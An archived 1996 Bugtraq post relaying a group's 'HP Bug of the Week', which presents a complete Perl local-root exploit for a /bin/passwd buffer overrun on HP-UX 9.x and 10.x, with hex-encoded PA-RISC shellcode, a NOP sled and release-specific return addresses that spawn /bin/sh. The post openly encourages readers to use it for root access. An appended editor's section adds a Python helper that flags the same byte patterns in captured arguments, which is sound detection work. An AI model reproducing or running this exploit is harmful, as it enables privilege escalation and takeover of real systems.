[3674] in bugtraq
HP Bug of the Week!
daemon@ATHENA.MIT.EDU (Aleph One)
Sat Nov 23 10:14:12 1996
Date: Sat, 23 Nov 1996 08:19:34 -0600
Reply-To: Aleph One <aleph1@dfw.net>
From: Aleph One <aleph1@dfw.net>
To: Multiple recipients of list BUGTRAQ <BUGTRAQ@NETSPACE.ORG>
From our SOD friends (http://command.com.inter.net/~sod/); Press D now if
you are easily offended:
This week: If I had a life, I wouldn't spend my Friday nights giving
you bugs
Good fuckin' day, eh? Welcome to the HP Bug of the Week -- if you
haven't come here looking for security holes to HP/UX computers,
you've come to the wrong fucking place. Otherwise look no further
because you've found the fuckin' mecca of the fuckin' desert. Our goal
here is to distribute those HP bugeridoo's as far and wide as is
fucking humanly possible, so tell a friend if you have one. We've got
a root hole from a buffer overrun in /bin/passwd this week, plus a
whole new section called "Other Folks Scripts" that rakes in the
wonderful works of other net.scriptors. So come on in, look around,
take all you want but eat all you take and as always, start clicking
your way to root access with scripts from the motherfuckin' folks at
SOD.
Vulgarity rating: 6 (scalawag)
Caveat Emptor
passwd is broked script for this week
#!/usr/bin/perl
# SOD /bin/passwd buffer overrun
use FileHandle;
sub h2cs {
    local($stuff)=@_;
    local($rv);
    while($stuff !~ /^$/) {
        $bob=$stuff;
        $bob =~ s/^(..).*$/$1/;
        $stuff =~ s/^..//;
        $rv.=chr(oct("0x${bob}"));
    }
    return $rv;
}
open(PIPE,"uname -r|");
chop($rev=<PIPE>);
close(PIPE);
$rev =~ s/^.*\.(.*)\..*$/$1/;
if ($rev eq "10") {
    $offset=2102;
    $prealign="AA"; # 2 byte pre
    $postalign=""; # 0 byte post
    $pcoq=h2cs("7b03b463");
} else {
    $offset=2170; # 2170 works for 9.X...
    $prealign=""; # zero byte pre
    $postalign="PP"; # 2 byte post
    $pcoq=h2cs("7b033018");
}
$nop=h2cs("08210280");
$code="";
$code.=h2cs("34160506"); # LDI 643,r22
$code.=h2cs("96d60534"); # SUBI 666,r22,r22
$code.=h2cs("20200801"); # LDIL L%0xc0000004,r1
$code.=h2cs("e420e008"); # BLE 4(sr7,r1)
$code.=h2cs("0b5a029a"); # XOR arg0,arg0,arg0
$code.=h2cs("e83f1ffd"); # BL .+8,r1
$code.=h2cs("08210280"); # NOP
$code.=h2cs("34020102"); # LDI 129,rp
$code.=h2cs("08410402"); # SUB r1,rp,rp
$code.=h2cs("60400162"); # STB r0,177(rp)
$code.=h2cs("b45a0154"); # ADDI 170,rp,arg0
$code.=h2cs("0b390299"); # XOR arg1,arg1,arg1
$code.=h2cs("0b180298"); # XOR arg2,arg2,arg2
$code.=h2cs("341604be"); # LDI 607,r22
$code.=h2cs("20200801"); # LDIL L%0xc0000004,r1
$code.=h2cs("e420e008"); # BLE 4(sr7,r1)
$code.=h2cs("96d60534"); # SUB 666,r22,r22
$code.=h2cs("deadcafe"); # Illegal instruction -- dump core if exec fails
$data="/bin/sh."; # Data stuff
$codedata=$code.$data;
$num=int(($offset-length($code)-length($data)-4)/4);
$pre="$nop"x$num;
$of=$prealign;
$of.=$pre.$code.$data.$postalign.$pcoq;
exec("/bin/passwd","$of");
Aleph One / aleph1@dfw.net
http://underground.org/
KeyID 1024/948FD6B5
Fingerprint EE C9 E8 AA CB AF 09 61 8C 39 EA 47 A8 6A B8 01
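Editor's addition to this archived post, not part of SOD's script or Aleph One's message: a small Python triage helper a responder could run over a captured argv[1] handed to /bin/passwd, keyed only on the byte patterns the script above uses (its NOP word, the first payload instruction, the "/bin/sh" string and the two per-release return-address words). The 256-byte sanity limit on a passwd argument and the sample argument are assumptions/constructed.

```python
import re

# Byte patterns taken from the SOD script above (assumption: the captured
# argument is the raw argv[1] handed to /bin/passwd, as bytes).
NOP = bytes.fromhex("08210280")             # PA-RISC NOP word used for the sled
SHELLCODE_HEAD = bytes.fromhex("34160506")  # first payload instruction (LDI 643,r22)
SHELL_STRING = b"/bin/sh"                   # data the payload carries
KNOWN_RETURN = {                            # return-address words the script selects by release
    bytes.fromhex("7b03b463"): "HP-UX 10.x",
    bytes.fromhex("7b033018"): "HP-UX 9.x",
}
MAX_SANE_ARG = 256   # assumption: a legitimate passwd argument (a login name) is far shorter

NOP_RUN = re.compile(b"(?:" + re.escape(NOP) + b")+")


def triage_passwd_arg(arg: bytes) -> dict:
    """Report what a captured argv[1] to /bin/passwd looks like.

    Flags the layout the script builds: a run of NOP words, the payload's first
    instruction, a "/bin/sh" string, and a known return-address word at the end.
    """
    # Longest run of consecutive NOP words (the sled), counted in words, not bytes.
    sled = max((len(m.group(0)) // len(NOP) for m in NOP_RUN.finditer(arg)), default=0)
    tail = arg[-4:] if len(arg) >= 4 else b""   # the script places the return address last
    report = {
        "length": len(arg),
        "nop_sled_words": sled,
        "has_shellcode_head": SHELLCODE_HEAD in arg,
        "has_shell_string": SHELL_STRING in arg,
        "tail_word": tail.hex(),
        "matches_release": KNOWN_RETURN.get(tail),
    }
    # Any one of these is enough to escalate; a plain login name triggers none of them.
    report["suspicious"] = (
        report["length"] > MAX_SANE_ARG
        or sled >= 4
        or report["has_shellcode_head"]
        or report["has_shell_string"]
        or report["matches_release"] is not None
    )
    return report


if __name__ == "__main__":
    # Constructed sample laid out like the script's payload, with the body elided.
    sample = NOP * 6 + SHELLCODE_HEAD + b"<elided>" + b"/bin/sh." + bytes.fromhex("7b03b463")
    for arg in (sample, b"alice"):
        print(triage_passwd_arg(arg))
```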